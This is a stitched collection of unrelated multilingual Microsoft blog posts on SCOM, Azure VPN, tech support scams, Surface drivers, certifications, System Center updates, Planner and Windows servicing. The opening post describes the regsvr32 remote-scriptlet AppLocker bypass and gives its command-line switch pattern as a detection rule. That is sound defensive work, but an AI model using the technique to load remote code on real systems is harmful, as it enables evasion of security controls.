I’ve started browsing some sites that are cataloguing known attack vectors and came across this particular vulnerability that is worth discussing.  Many seasoned IT pros understand the use of RegSvr32 to register DLL files.  This executable is very integral to Windows as registers DLLs for OS and application use.  A little known flaw is that it can be used to load DLL files that are not contained on the server itself, thus bypassing antivirus detection. We’ve already built one rule set based off this flaw for a known attack method which is documented here. In this particular case, we are looking for a method to bypass AppLocker.  The attacker loads a DL file called scrobj.dll from a remote location.  While this is beneficial in detecting a known attack, this attack method can easily be altered as names of DLL files can be changed on recompile. 

That said, the method is not quite as easy to adjust.  The attacker must use a URL allowing us to create a rule set in SCOM to audit process creation looking for that specific in formation.  The criterion is fairly straight forward:

• Event ID = 4688
• Parameter 9 contains either of these strings:

• /s /n /u /i:http://
• /s /n /u /i:https://

For the purpose of this rule, I’m not continuing to filter by regsvr32.  That keeps me out of playing around with case sensitivity when matching a pattern.  The switches and URL call should match.

A more thorough explanation of what is going on with this method of attack can be found at this location.

I would note that while Antivirus cannot catch this method, EMET is a mitigation for it.  If EMET is not configured for your environment though, this rule set targeted towards Windows Servers and EventCollectors should work if you have them enabled.

With that said, I’m testing this in my lab presently and plan on including it in the next release of the Security Monitoring Management Pack. I’m not expecting much in terms of noise, but if by chance you have a legitimate application that is using this method, you can use choose to add a Parameter 9 ‘does not contain’ <insert name of DLL here> to the and portion of this rule.  That will eliminate any noise associated with known applications.

Microsoft Service Trust Preview: Cloud braucht Vertrauen

„Unternehmen und Anwender nehmen Technik nur an, wenn sie ihr vertrauen können“. Das sagte Microsoft CEO Satya Nadella. Und er hat damit natürlich Recht. Und genau aus diesem Grund tun wir alles, damit Kunden Vertrauen fassen in unsere Cloud-Angebote. Denn wir nehmen dieses Vertrauen nicht als gegeben an.

Ein weiterer Vertrauensbaustein ist unsere Website Service Trust Preview. Sie steht allen Cloud-Kunden gratis zur Verfügung und lieferte folgende Informationen und Dokumente.

1. Berichte von Zertifizierungsaudits wie ISO oder SOC für die verschiedenen Microsoft-Cloud-Angebote wie Azure, Office 365, Dynamics 365, PowerBI oder Yammer. Es finden sich auch die Reports, die die Microsoft Cloud Deutschland betreffen.
2. Technische Whitepaper und FAQs, die unsere Sicherheitsmechanismen und deren Implementierung erläutern. Darunter auch Erläuterungen zum Datentreuhänder der Microsoft Cloud Deutschland oder die Cloud Control Center.
3. Ein Compliance-Leitfaden, der Kunden beim Umgang mit den Sicherheits- und Compliance-Mechanismen hilft, die sie selbst verantworten.

Zertifizierungen der Microsoft Cloud Deutschland

Die Microsoft Cloud Deutschland (MCD) durchlief mehrere Zertifizierungsverfahren. Service Trust Preview liefert für diese Zertifizierungen jeweils ausführliche Dokumente (siehe Liste unten). Außerdem finden sich noch weitere Dokumente, die technische Details der MCD erläutern. Der Bestand an Unterlagen wird laufend erweitert.

• Office 365 – ISO 27017 (Weltweit und Deutschland) – Code of Practice for Information Security Controls – Certificate
• Office 365 – ISO 27018 (Weltweit und Deutschland) – Code of Practice for Protecting Personal Data in the Cloud – Certificate
• Office 365 – ISO 27001 (Weltweit und Deutschland) – Information Security Management Standards – Certificate
• Office 365 – ISO 27001 ISO 27017 und ISO 27018 (Deutschland) – Audit Assessment Report
• Azure – ISO 27001 (Deutschland) – Information Security Management Standards – Certificate
• Azure – ISO 27018 (Deutschland) – Code of Practice for Protecting Personal Data in the Cloud -Certificate
• Azure – IT Grundschutz-Handbuch
• Microsoft Cloud Deutschland: Das Datentreuhändermodell und die Cloud Control Center

Gastbeitrag von Michael Kranawetter, National Security Officer (NSO) bei Microsoft in Deutschland. In seinem eigenen Blog veröffentlicht Michael alles Wissenswerte rund um Schwachstellen in Microsoft-Produkten und die veröffentlichten Softwareupdates.

Ever wondered what objects are setup for OMS?

Maybe you’ve seen lots of errors on servers you don’t expect ?

It’s possible someone chose a group or nearly all managed computers in your SCOM environment.

How do we verify, or change what computers send data to OMS from SCOM?

1) Look for a group
In SCOM console, monitoring tab

Look for the ‘advisor’ group
Maybe someone put a group in there

2) Verify OMS members

In the SCOM console, Administration tab
Click on Managed Computers
See middle pane for what is currently set up

Update OMS Managed computers

In the SCOM console, Administration tab
Click on Managed Computers
See middle pane for what is currently set up

Click the ‘Add a computer/group’ link on the tasks pane (right side)

Add computers or groups

Add keyword, click search, highlight and click Add

Click OK when done updating members

Optionally, highlight the member, click delete

Verify the Advisor MP’s on computer

Go to server (added or removed)

If added, look for 1201 events in the Operations Manager Log

If removed, look for 1204 events in the Operations Manager Log

Enjoy!!

I ran into an interesting issue with a customer this week. We were deploying a route based VPN from Azure Resource Manager to the customer’s Palo Alto PA-5020 running PANOS 7.1.8. We were able to stand up the VPN tunnel easily enough but we could not RDP to VMs running in Azure using the VPN while RDP using the public IP worked. We could open port 3389 via a telnet command, but RDP would time out. When running a network trace we saw a fair amount of re-transmits so as a troubleshooting step we lowered the MTU to account for VPN over-head. This didn’t help for our use case. The fix turned out to be selecting “Enable NAT Traversal” (the VPN device was not behind a NAT) on the IKE gateway.

MTU Setting:

NAT Setting:

We don’t (yet) have a good reason as to why this setting solved the RDP issue. I’ll comment on this when I know, and if you have some ideas, please feel free to comment.

本記事は、Microsoft Digital Crimes Unit の Courtney Gregoire による投稿 “The fight against tech support scams” (2017 年 5 月 18 日 米国時間公開) を翻訳したものです。

この 1 か月を通して、ワシントンの消費者にテクニカル サポート詐欺を発見し回避する方法を周知するために、全米退職者協会 (AARP)、連邦取引委員会 (FTC)、ワシントン州検事総長の Bob Ferguson 氏、および Boeing Employees Credit Union (BECU) の皆さんとともに、一連の「詐欺師の正体を暴く」イベントに参加します。

高齢者だけが詐欺師の標的となっているわけではありません。まだテクニカル サポート詐欺を経験したことがない皆さんでも、おそらく他の誰かが経験したという話を聞いたことがあるでしょう。2016 年の世界的な調査によると、過去 12 か月間に 3 人に 2 人がテクニカル サポート詐欺を経験しています。

サイバー犯罪者は、勧誘の電話や Web 広告、執拗で迷惑なポップアップ ウィンドウなど、さまざまな方法を使って消費者をだまします。これらの詐欺師をつなぐ全世界的なネットワークは、消費者情報を交換および販売してリードを獲得するマーケティング専門家、調査員から金銭の流れを隠す支払処理業者、ありもしない技術的な問題があるとお客様に思い込ませるようトレーニングされた全世界の大小のコール センターの運用、そして消費者のコンピューターにインストールされ、問題があると偽のアラートを出したり、ありもしない問題を「駆除」したかのように見せる偽ツールを作成するソフトウェア開発者などを、大いに活用します。

サイバー犯罪者が消費者をだますために使用する最新の不正なポップアップ広告の例

マイクロソフトのアプローチ マイクロソフトの Digital Crimes Unit (DCU) では、(1) データに基づくアプローチでテクニカル サポート詐欺のネットワークを調査し必要に応じて法的措置に委ねる、(2) さまざまな詐欺の手法から消費者をより確実に保護するために技術を強化する、そして (3) オンラインで安全を保つ方法を消費者に伝えることにより、このように人々に降りかかるサイバー犯罪と戦っています。 マイクロソフトは、テクニカル サポート詐欺の経験を http://www.microsoft.com/reportascam から直接報告するよう、お客様にお願いしています。これらの報告にはしばしば「90 歳の祖母の代わりに提出しています」、または「祖母が Facebook のソリティアで遊んでいたら、コンピューターがウイルスに感染したので電話をするよう促すポップアップが出ました」などのフレーズが含まれています。これらの個別の報告は重要なものですが、単独では法的処置をとることは難しいと思われます。マイクロソフトのデータ分析チームは、高性能なツールを使って情報を並べ替えてグループ化し、詐欺の範囲についてさらに包括的な見解を構築します。DCU はマイクロソフトの Artificial Intelligence & Research (AI&R) などと協業して、このデータの充実を図っています。私たちは、全世界で表示されているポップアップの画像を取得し、機械学習を使って訴訟内容を支持する重要な情報を収集するプロセスを共同で構築しました。

テクニカル サポート詐欺の規模と範囲に対応するには、総動員でアプローチする必要があります。そのため、Apple、Dell、Yahoo、HP などの各社の代表者と共に、業界全体で調査のためのワーキング グループを定期的に開催しています。ロボコールおよび電話勧誘による詐欺の根強い問題に対処するために、マイクロソフトは Robocall Strike Force (ロボコール対策に関する連合体) に参加しています。そしてテクニカル サポート詐欺と戦うために、引き続き通信会社、支払処理業者や Web 運営会社などと一緒に取り組んでいきます。

テクニカル サポート詐欺に対抗するための世界的な取り組み

5 月 12 日 金曜日、マイクロソフトの DCU が標的としていた多くのテクニカル サポート詐欺者に対して、法的措置が実施されたことを嬉しく思います。この協調的な取り組みの一部として、連邦取引員会とそのパートナーは 16 の新しいアクションを発表しました。そこには不正なテクニカル サポート運用にかかる告発、和解、起訴状および有罪答弁が含まれています。7 名の個人が、フロリダの Client Care Experts における不正な運用への関与について刑事告発を受けました。おおよそ 2013 年 11 月から 2016 年までの間、40,000 名以上が Client Care Experts の犠牲になり、25,000,000 米国ドル以上がだまし取られました。

わたしたちは、サイバー犯罪者が地政学的な境界線の制約を受けないことを知っています。DCU はドイツからシンガポール、またカナダからインドまで、マイクロソフトのグローバルな組織を活用して不正を調査し、サイバー犯罪と戦っています。2016 年 11 月、わたしは米国司法省と連邦取引委員会の代表と共にインドへの派遣団に加わりました。その目的は、コールセンター詐欺に対処する緊急性について法執行機関と直接話し合うことと、起こり続けるコールセンター詐欺によって業務処理業界に所属する人たちが被っている風評被害について議論することでした。直接、提訴することに加えて、Microsoft India ではこの 1 年間で 385 名の法執行官と 400 名以上の検察官に対するサイバー犯罪のトレーニングを支援しました。

検察官と司法官に対するサイバー犯罪のトレーニングの様子。2017 年 1 月 22 日、インド、ムンバイのマハーラーシュトラ司法アカデミーにて。

これらの取り組みの成果が出始めています。昨年の秋、インドの法執行機関は IRS やテクニカル サポートを装った悪名高い詐欺を含め、米国の消費者が主な標的となった詐欺に関与した 12 のコールセンターを強制捜査しました。マイクロソフトは引き続き、グローバル チームを活用して消費者を標的とするサイバー犯罪者を調査し、必要に応じて法的措置に委ねます。同時に、国際的な法執行機関はこれら境界のない進化し続ける犯罪に立ち向かうために、重要なリソースをつぎ込む必要があります。

より安全なプラットフォームを構築する

マイクロソフトはお客様のために、サイバー犯罪者の行動について学習したことを製品の改善に反映しています。Windows 10 では、より多くのセキュリティ機能、より安全な認証、そしてデバイスのサポート ライフタイム中の継続的な更新プログラムの提供など、組み込まれた保護策を用意しています。Windows Defender は電子メール、クラウドおよび Web を、ソフトウェアの脅威から包括的かつリアルタイムに保護します。Windows、Microsoft Edge および Internet Explorer に組み込まれている SmartScreen フィルターは、苛立たしいポップアップ ウィンドウなどを含む悪意のある Web サイトやダウンロードから保護します。そして 2016 年に Bing は 1,700 万件以上の詐欺的なテクニカル サポート広告をブロックしました。

詐欺から自分の身を守るために最も効果的なのは、学ぶことです。信頼のできるソフトウェア会社と名乗る人から通知や電話を受けた場合、以下に留意してください。

• 一方的にかかってくる未承認の電話や、デバイスでのポップアップ メッセージに用心してください。
• マイクロソフトが、勝手にコンピューターを送りつけたり、要求されていないテクニカル サポートをプロアクティブに提供することはありません。マイクロソフトとお客様との間のコミュニケーションは、お客様が主導しなければ始まることはありません。
• デバイスに表示されたポップアップ ウィンドウに記載されている電話番号にかけないようにします。マイクロソフトのエラー メッセージや警告に、電話番号が含まれることはありません。
• すでにお客様として登録しているコンピューターのサポート チームの正規の担当者であることを確認できない限り、サード パーティにコンピューターの制御を決して渡さないようにします。
• 疑わしい場合は、相手の情報を書き留め、直ちに地元の機関に報告します。

テクニカル サポート詐欺から自分の身を守るための詳細情報は、以下を参照してください。

• Microsoft:
  • テクニカル サポート電話詐欺を避ける
  • Microsoft Digital Crimes Unit’s and AARP Fraud Watch Network’s “Avoiding Tech Support Scams” Booklet (PDF) (英語情報)
  • Report a Tech Support Scam (英語情報)
• 米国連邦取引委員会
  • Consumer Resources Website on Tech Support Scams (英語情報)
  • Scam-O-Meter: Tech Support (ビデオ) (英語情報)

Today we’ve released updated drivers for the Surface Pro 4. These include the Surface System Aggregator Firmware, Intel(R) Precise Touch Device, and Surface Integration drivers that we released last month for devices with Windows 10 Version 1703 (Creators Update), now available for Windows 10 Version 1607 (Anniversary Update) and Windows 10 Version 1511 (November Update). We’ve also updated the drivers for Surface Embedded Controller Firmware, Surface Touch Servicing ML, Surface Touch, and Surface UEFI. These updates resolve screen brightness issues when devices come out of sleep, refine brightness settings, optimize touch functionality, adjust hibernation defaults, disable touch when the cover is closed, and provide improvements to stability and battery life during sleep.

For Surface Pro 4, the updates are available in MSI and ZIP format from the Surface Pro 4 Drivers and Firmware page in the Microsoft Download Center. Click Download to download the following files:

• SurfacePro4_Win10_15063_1702001_0.msi
• SurfacePro4_Win10_15063_1702001_1.zip
• SurfacePro4_Win10_10586_1702001_0.msi
• SurfacePro4_Win10_10586_1702001_1.zip

Note: On the download page, you will notice that there are multiple versions of the ZIP and MSI files. Each of these files includes in Surface Embedded Controller Firmware (v103.1684.256.0) improves battery life during sleep.

the name a Windows 10 build number indicating the minimum supported build required to install the drivers and firmware contained within. For example, to install the drivers contained in SurfaceBook_Win10_15063_1702001_0.msi you must have Windows 10 Creators Update (Version 1703) or newer installed on your Surface Book device. You can find a list of the build numbers for each version of Windows 10 in Windows 10 release information. Files that do not contain a build number in their name are applicable to all versions of Windows 10.

Surface Pro 4

• Intel(R) Precise Touch Device (v1.2.0.83) disables touch when cover is closed and improves stability.
• Surface Integration (v1.0.121.0) adjusts system hibernation defaults
• Surface Touch Servicing ML (v1.0.724.0) updates touch functionality.
• Surface System Aggregator Firmware (v103.1610.256.0) resolves screen brightness issues when device comes out of sleep.
• Surface UEFI (v106.1624.768.0) refines brightness settings.
• Surface Touch (v57.1.1.1) optimizes touch functionality.

マイクロソフトの認定資格は、世界的に認識されている業界に支持されたスキルを習得している証を提供し、あなたの能力を実証、新しい技術を受け入れる意欲がある事を示してくれます。

マイクロソフト認定資格を取得して、チャンスをものにしよう。

現在、マイクロソフトロゴグッズ、資格ロゴグッズが貰えるスキルアップキャンペーンを実施中です

Windows10関連の認定資格には、MCSA: Windows 10とMCSE: Mobilityがあります。

MCSA: Windows 10

Windows 10 のエンタープライズ システムを構成、管理、およびサポートするための専門知識があることを証明します(IT 関連の経験が浅い方は、入門者レベルの MTA 認定資格の取得を目指しましょう)。

MCSA: Windows 10 認定資格を取得すると、コンピューター サポート スペシャリストとしての職務に適格であることが示されます。

必須試験科目：

70-698 Installing and Configuring Windows 10

70-697 Configuring Windows Devices

公式ハンズオントレーニング

23697-1B Windows 10 のインストールと構成 グローバルナレッジ、NECマネジメントパートナーにて実施中

エンタープライズ サービスによる Windows 10 の展開と管理

グローバルナレッジにて実施中

書籍

徹底攻略MCP問題集Windows 10［70-698：Installing and Configuring Windows 10］対応(インプレス)

徹底攻略MCP問題集 Windows 10［70-697：Configuring Windows Devices］対応（インプレス）

MCP教科書 Windows 10（試験番号：70-697）スピードマスター問題集（翔泳社）

MCP教科書 Windows 10（試験番号：70-697）（翔泳社）

MCSE: Mobility

MCSE: Mobility 認定資格では、今日の Bring Your Own Device (BYOD) エンタープライズのデバイスの管理に必要なスキルを身に付けていることを実証します。従来のデスクトップ サポート技術者から、エンタープライズの BYOD デバイスおよびアプリの管理まで、幅広いキャリア パスの資格が与えられます。

この MCSE 認定資格に有効期限はなく、資格の更新も必要ありません。ただし、暦年ごとに認定資格を取得して、トランスクリプトに項目を追加することはできます。そのためには、選択試験のリストにある一意の試験に合格する必要があります。これにより、特定の技術分野のスキルを広げたり深めたりするための投資を継続的に行っていることを実証できます。

MCSA: Windows 10 を取得したのち、2017 年中に次のいずれかの選択試験に合格します。

70-695 Deploying Windows Desktops and Enterprise Applications

70-696 Administering System Center Configuration Manager and Intune

70-398 Planning for and Managing Devices in the Enterprise

公式ハンズオントレーニング

20695 Windows デスクトップおよびエンタープライズ アプリケーションの展開

23696 System Center Configuration Manager およびIntune の管理(グローバルナレッジ)

こんにちは、日本マイクロソフト System Center Support Team の益戸です。

2017 年 5 月 24 日に System Center 2016 向けに Update Rollup 3 (UR3) がリリースされましたのでお知らせいたします。

Update Rollup 3 for System Center 2016
https://support.microsoft.com/ja-jp/help/4020906/update-rollup-3-for-system-center-2016
このリリースでは、以下の製品に対して修正プログラムが提供されています。本修正プログラムは、Microsoft Update 経由で修正プログラムをダウンロードしてインストールすることができます。また、オフラインの環境では、Microsoft Update Catalog を通じてダウンロードしたパッケージを手動で適用することもできます。詳細な適用手順や、修正内容については、それぞれのリンクをご参照ください。
・Operations Manager (KB4016126)
https://support.microsoft.com/ja-jp/help/4016126/
* 修正プログラム適用後に、レジストリの変更や、SQL の実行、管理パックのインポート等が必要です。
・Service Manager (KB4019979)
https://support.microsoft.com/ja-jp/help/4019979
* 修正プログラム適用後に、一部ファイルの修正等が必要です。
・Virtual Machine Manager (KB4014528)
https://support.microsoft.com/ja-jp/help/4014528
* Update Rollup 適用時の注意点については、以下の技術情報も参照ください。

How to install, remove, or verify update rollups for Virtual Machine Manager 2012 R2
https://support.microsoft.com/kb/3066343

How to Update the VMM Agent
https://technet.microsoft.com/ja-jp/library/hh430984.aspx

VMM 2012 R2 Update Rollup を適用する際の注意点
http://blogs.technet.com/b/systemcenterjp/archive/2015/07/28/3652622.aspx

まずはリリースの告知をさせていただきました。ぜひ適用をご検討ください。

こんにちは、日本マイクロソフト System Center Support Team の益戸です。

2017 年 5 月 24 日に System Center 2012 R2 向けに Update Rollup 13 (UR13) がリリースされましたのでお知らせいたします。

Update Rollup 13 for System Center 2012 R2
https://support.microsoft.com/ja-jp/help/4020917/update-rollup-13-for-system-center-2012-r2
このリリースでは、以下の製品に対して修正プログラムが提供されています。本修正プログラムは、Microsoft Update 経由で修正プログラムをダウンロードしてインストールすることができます。また、オフラインの環境では、Microsoft Update Catalog を通じてダウンロードしたパッケージを手動で適用することもできます。詳細な適用手順や、修正内容については、それぞれのリンクをご参照ください。

 
・Data Protection Manager (KB4021873)
https://support.microsoft.com/ja-jp/help/4021873
* 修正プログラム適用後に、Agent のアップグレードが必要です。ご利用のバージョンによっては、Agent アップグレード後は再起動が必要です。

 
・Operations Manager (KB4016125)
https://support.microsoft.com/ja-jp/help/4016125
* 修正プログラム適用後に、レジストリの変更や、SQL の実行、管理パックのインポート等が必要です。
また、アップデートの順番についても指定がございますので、ご注意ください。

 
・Virtual Machine Manager (KB4014525)
https://support.microsoft.com/ja-jp/help/4014525
* Update Rollup 適用時の注意点については、以下の技術情報も参照ください。

How to install, remove, or verify update rollups for Virtual Machine Manager 2012 R2
https://support.microsoft.com/kb/3066343

How to Update the VMM Agent
https://technet.microsoft.com/ja-jp/library/hh430984.aspx

VMM 2012 R2 Update Rollup を適用する際の注意点
http://blogs.technet.com/b/systemcenterjp/archive/2015/07/28/3652622.aspx

まずはリリースの告知をさせていただきました。ぜひ適用をご検討ください。

なお、System Center 2012 R2 につきましては、2017 年 7 月 11 日をもってメインストリーム サポートを終了いたします。
メインストリーム サポート終了後は、設計の変更や、新しい機能の要求を受け付けることが出来なくなります為、不具合等が発生した場合につきましても、ご要望をお受けすることができなくなる場合が多々ございます。

 
引き続き、安心してご利用いただくためにも、System Center 2016 へのアップグレードをご検討ください。

製品のライフサイクル (System Center 2012 R2)
https://support.microsoft.com/ja-jp/lifecycle/search?alpha=Microsoft%20System%20Center%202012%20R2

ライフサイクルに関する FAQ – ポリシーに関する一般的な質問
https://support.microsoft.com/ja-jp/help/17140/lifecycle-faq-general-policy-questions

Автор статьи  – Виталий Веденев.

С помощью планировщика Microsoft Planner, входящего в состав Office 365 [1], с появлением возможности назначения нескольких исполнителей на одну задачу [2] теперь можно обеспечить коллективную постановку задач в ходе учебного проектирования, организовать по-новому мозговой штурм и т.п.

Что вы будете знать и уметь после прочтения этой статьи?

– Как организовать коллективное выполнение задач и заданий с помощью Microsoft Planner (планировщика) в Microsoft Teams и группе Office 365?

Я уже рассматривал вопросы, связанные с организацией обучения в группе Office 365 [1,3].

Planner – это сервис, который хорошо дополняет визуальным способом представления хода выполнения учебных задач.

Рассмотрим несколько примеров организации обучения в группе с использованием возможности назначения нескольких исполнителей на одну задачу.

Сценарий 1. Назначаем задания в подгруппах учебной группы с помощью Microsoft Planner в Microsoft Teams

Во втором сценарии статьи Microsoft Office 365 в образовании. Варианты организации обучения в чате Microsoft Teams. Продолжение https://blogs.technet.microsoft.com/tasush/2017/04/21/varianty-organizacii-obuchenija-v-chate-microsoft-teams-prodolzhenie/ разобран ход планирования проектной деятельности в группе Microsoft Teams [3].

Рассмотрим более подробно последовательность назначения заданий для обучаемых в подгруппе проектной группы:

Что отображено на схеме-изображении:

1. На рисунке представлено назначение задания с помощью планировщика (Planner) в канале группы («Команды») Microsoft Teams.
2. Для этого педагогу необходимо добавить в канал (в примере: «Тема 1. Планирование») «Планировщик» с использованием уже существующего плана.
3. В появившемся окне планировщика (Planner) будет доступно назначение задач, вводим название задачи, устанавливаем срок и добавляем назначение участников группы для конкретной подгруппы из открывающегося списка.
4. Затем нажимаем кнопку «Добавить задачу» и в окне задачи (Задание) заполняем все необходимые поля. После ввода текста в примечание будут автоматически разосланы электронные письма.
5. Каждый участник подгруппы может ознакомиться с информацией по заданию в планировщике личного профиля. Сообщение Planner будет информировать вас о том, что это задание группе (в примере, подгруппе).

Сценарий 2. Назначаем задания в подгруппах учебной группы с помощью Microsoft Planner из планировщика группы Office 365

Можно непосредственно планировать учебную деятельность, создавать задания для подгрупп из планировщика группы Office 365 [4].

Для этого педагогу:

1. В Outlook необходимо найти учебную группу Office 365 (в примере «9а») и в меню группы перейти к «Дополнительно».
2. В открывшемся списке выбираем «Планировщик».
3. Переходим в Planner и в «Доска», создаем задачу для подгруппы по аналогии со сценарием 1 (в той же последовательности).
4. Визуальное отображение хода выполнения заданий (задач) можно просмотреть здесь же: в Planner (Центр Planner) на диаграмме.

В обоих сценариях рассмотрены разные варианты создания (планирования) групповых заданий в группе Office 365.

Использованные источники:

1. Microsoft Office 365 в образовании. Организуем учебную деятельность в Office 365 с помощью нового сервиса Planner
2. Назначение нескольких исполнителей на одну задачу в Microsoft Planner
3. Microsoft Office 365 в образовании. Варианты организации обучения в чате Microsoft Teams. Продолжение
4. Microsoft Office 365 в образовании. Новые возможности в организации обучения в группе Office 365

You’ve no doubt heard that the WannaCrypt ransomware is also a worm. The propagation code exploits a patched SMB vulnerability – CVE-2017-0145.

How can we use PowerShell to create a Common Vulnerabilities and Exposures (CVE) report for that vulnerability?

Set-MSRCApiKey -ApiKey XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

$cvrfDoc = Get-MsrcCvrfDocument -ID 2017-Mar

$Properties = @{
    Vulnerability = ($cvrfDoc.Vulnerability | Where-Object {$_.CVE -like "CVE-2017-0145"})
    ProductTree   = $cvrfDoc.ProductTree
}

Get-MsrcVulnerabilityReportHtml @Properties | Out-File -FilePath CVE-2017-0145.html

Have a look here for details of how to obtain the MsrcSecurityUpdates PowerShell module.

Input your MSRC API key. You can obtain one from here.

Now, request the Common Vulnerability Reporting Framework (CVRF) document for the March 2017 update (contains MS17-010 which patches the SMB vulnerability). Parse the document for CVE-2017-0145 and then splat the collected information into Get-MsrcVulnerabilityReportHtml cmdlet to generate a html report.

Want all of the CVEs that MS17-010 patches? Try this tweak…

Vulnerability = ($cvrfDoc.Vulnerability | Where-Object {$_.CVE -like "CVE-2017-014[3-8]"})

Customer Guidance for WannaCrypt attacks

Questo articolo è parte di una serie che vuole parlare dei concetti di Windows come Servizio

• Parte 1 – Introduzione a Windows come servizio
• Parte 2 – Ciclo di vita di una build e supportabilità
• Parte 3 – Gestione degli aggiornamenti Quality Updates
• Parte 4 – Overview sugli aggiornamenti Features Update

E’ uscita una nuova build, come faccio ad adottarla?

Come detto negli articoli precedenti, Microsoft crea due Feature Updates (le build) due volte l’anno, a Marzo e Settembre, rilasciandole tramite i suoi canali nel mese successivo alla fine dello sviluppo (quindi in Aprile e Ottobre).

I canali da cui è possibile ricevere queste build sono Windows Update e il sito Volume License (per chi ha acquisito la licenza E3 o E5 di Windows).

Riguardo agli strumenti di aggiornamento, è possibile utilizzare:

• Windows Update/Windows Update for Business
• Windows Server Update Services (WSUS)
• System Center Configuration Manager (SCCM)
• Tool di terze parti similari a SCCM

Windows Update/Windows Update for Business

I features update vengono rilasciati come pacchetti di aggiornamento da Windows Update.

Ho quindi la possibilità di lasciare che il device contatti Windows Update, si accorga dell’aggiornamento, lo scarichi e lo applichi.

Per evitare un riavvio indesiderato, meglio impostare correttamente “l’orario attività” presente nel nuovo pannello di controllo nella sezione “Aggiornamento e sicurezza”.

E’ inoltre possibile configurare se si vuole ricevere subito una build (ramo Current Branch) o attendere 4 mesi dal rilascio (ramo Current Branch for Business). Ci sono altre opzioni interessanti compresa quella della sospensione temporanea (fino a 7 giorni) degli aggiornamenti.

Si trova tutto nella sezione “Aggiornamenti Avanzati”

E’ inoltre possibile risparmiare traffico di rete utilizzando la feature Delivery Optimization che permette la condivisione degli aggiornamenti tra macchine vicine. Ne ho parlato in questo articolo a proposito dei Quality Updates.

Sempre nello stesso articolo ho parlato di Windows Update for Business che altro non è che una serie di policy (Group policy o MDM policy) che comandano il device a prendersi un aggiornamento (Quality o Feature) dopo x-giorni dalla pubblicazione.

Sarà quindi possibile impostare un gruppo di macchine pilota che installerà l’aggiornamento da Windows Update il giorno stesso della sua disponibilità, un altro gruppo che lo installerà qualche giorno dopo e così via andando per scaglioni.

Se utilizzo un Mobile Device Manager tool tipo Intune per gestire il mio Windows 10, gli aggiornamenti comprese i Features Updates verranno presi da Windows Update for Business e ci penserà la policy MDM a gestire le opzioni disponibili.

Windows Server Update Services

Se si utilizza WSUS, la build verrà comunque trattata come se fosse una patch. WSUS supporta sia Branch Cache (feature di Windows 10 Enterprise) che Delivery Optimization per ottimizzare la banda utilizzata.

System Center Configuration Manager

SCCM ha una sua sezione specifica chiamata “Windows 10 Servicing” che permette di:

• Avere delle dashboard in grado di fornire informazioni su quanti e quali sistemi utilizzano una certa build
• Creare dei Servicing Plan

I Servicing Plan permettono di automatizzare l’installazione della build andando a definire dei gruppi di adozione (i ring) e le tempistiche di innesco dell’installazione.

SCCM permette l’utilizzo sia di Branch Cache che di Peer Cache per l’ottimizzazione del traffico di rete.

Tool di gestione di terze parti

Qui entriamo in un terreno che non è il mio nel senso che conosco abbastanza bene tutta una serie di tool di gestione quali LanDesk, IBM TEM, Symantec Altiris… Ma per quanto riguarda Windows 10, al momento della scrittura di questo articolo, non sono a conoscenza di processi per l’aggiornamento delle build simili a quello descritto qui sopra per SCCM.

Comunque sia, anche che non ci fossero, è sempre possibile innescare l’aggiornamento di una build tramite uno script nel senso che il “motore” di aggiornamento viene scatenato dal classico Setup.exe presente nella ISO di Windows 10 condito da tutta una serie di switch che permettono l’installazione silente.

Per sapere quali sono questi switch, basta da riga di comando eseguire setup.exe /?

Cifratura del disco

Come punto di attenzione vorrei sollevare la tematica della cifratura del disco… Windows 10 sia Professional che Enterprise permettono di utilizzare la feature Bitlocker compresa nel sistema operativo (in Windows 7 era disponibile solo nella versione Enterprise) ma ci sono disponibili sul mercato altre soluzioni di terze parti.

Il punto d’attenzione è dato dal fatto che la procedura di aggiornamento del sistema operativo passa dal seguente processo:

• I file vengono inseriti nella cache locale del device da aggiornare
• I file vengono scompattati, si cambia il boot order e si effettua un riavvio
• Viene avviato in automatico Windows PE (versione minimale di Windows che lavora esclusivamente in RAM)
• Windows PE che lavora in RAM vede “dall’alto” il disco ed è in grado di aggiornare il sistema operativo

Se la cifratura è Bitlocker, allora il sistema la conosce e quindi prima di effettuare il riavvio questa viene messa in pausa e quindi il processo di aggiornamento non ha problemi ad effettuarsi.

Se però la cifratura è di terze parti, sarà compito di chi aggiorna premunirsi di mettere in pausa/disabilitare la cifratura prima di innescare l’aggiornamento pena la non riuscita dello stesso.

Con questo non voglio sconsigliare i tool di terze parti per la cifratura, ma voglio semplicemente darvi la consapevolezza che in loro presenza è necessario una serie di azioni pre e post per far si che l’aggiornamento di build abbia successo.

Antivirus di terze parti

Punto di attenzione simile a quello su Bitlocker… Essendo che gli antivirus lavorano a stretto contatto con il sistema operativo è sempre necessario assicurarsi di avere la versione corretta dell’antivirus prima di effettuare l’aggiornamento di Windows 10.

Il pericolo è che l’aggiornamento di build non si completi correttamente perché l’antivirus lo riconosce come azione malevola oppure che l’antivirus non funzioni correttamente una volta completato il Feature Update.

In ogni caso sempre meglio guardare la pagina web del proprio vendor Antivirus o contattarlo per sapere se ci sono problematiche note (non succede spesso ma se succede si potrebbe perdere tempo).

Utilizzando Windows Defender come antivirus non si hanno tipicamente problemi essendo parte del sistema operativo che si aggiorna.

Aggiornamento per Delta

E’ in fase di sviluppo (al momento della scrittura di questo articolo) la possibilità di aggiornare le build andando a mettere nella cache del device solo i file che sono stati cambiati/aggiunti tra una build e l’altra. In questo modo si sitima un risparmio di grandezza dell’update di almeno il 35%.

Il rilascio di questa funzionalità è previsto con Fall Creators Update ovvero la prossima build prevista per Settembre 2017.

Conclusioni

Il Windows as a Service introduce dei concetti decisamente nuovi per le aziende andando a semplificare la gestione delle postazioni di lavoro e aggiungendo in modo continuo funzionalità in grado di seguire i bisogni degli utenti in termini di utilizzo e protezione del loro device.

Vengono rilasciate due build all’anno che non rappresentano un nuovo sistema operativo ma una strettissima derivazione del precedente dove la compatibilità applicativa con il passato vuole essere preservata.

L’installazione sia di Quality che Features update può essere facilitata dai meccanismi differenziali e di condivisione dei contenuti.

Frauen sind in Führungspositionen nach wie vor unterrepräsentiert – je höher die Führungsebene, desto geringer der Frauenanteil. Und das obwohl Studien zeigen, dass weibliche Führungskräfte einen positiven Einfluss auf Unternehmenskultur und -erfolg haben. Diese Umstände sind seit Jahren bekannt. Müssen wir also wirklich noch immer darüber sprechen?

